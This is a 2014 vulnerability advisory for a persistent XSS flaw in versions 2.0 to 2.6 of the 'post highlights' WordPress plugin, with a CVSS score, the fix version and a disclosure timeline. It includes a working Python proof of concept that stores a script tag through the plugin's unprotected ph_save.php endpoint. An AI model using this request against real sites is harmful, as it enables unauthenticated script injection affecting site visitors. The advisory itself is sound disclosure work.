post highlights 2.0 - 2.6, Persistent XSS

Due to a script having no access protection, and including the ‘wp-load.php’ script, it is possible to update the ‘post highlights’ settings for any post. Using this flaw, you can enable ‘post highlights’ and insert arbitrary HTML content, which will then be output on the page. This output is not filtered or encoded, and as such allows any HTML content to be inserted, such as SCRIPT / IFRAME tags.

Homepage

https://wordpress.org/plugins/post-highlights/

CVSS Score

6.4

CSSS Vector

(AV:N/AC:L/Au:N/C:P/I:P/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 2.6.1.

Proof of Concept

The following Python script will enable ‘post highlights’ a post with the ID of ‘1’, and set the ‘headline’ field to an arbitrary piece of HTML, which results in a JavaScript alert being fired.

import requests

url = 'http://localhost/wp-content/plugins/post-highlights/ajax/ph_save.php'
payload = {
	"action":"highlight",
	"id":"1"
}
requests.post(url, data=payload)
payload = {
	"action":"headline",
	"id":"1",
	"txt":"<script>alert('.');</script>"
}
r = requests.post(url, data=payload)

Timeline

  • 2014-10-09: Discovered
  • 2014-10-09: Reported to vendor
  • 2014-10-09: CVE requested
  • 2014-10-11: CVE assigned
  • 2014-10-27: Update requested from vendor
  • 2014-11-03: Advisory released
  • 2014-11-03: Vendor contacted with intent to fix after release of advisory
  • 2014-11-03: Version 2.6.1 released – issue resolved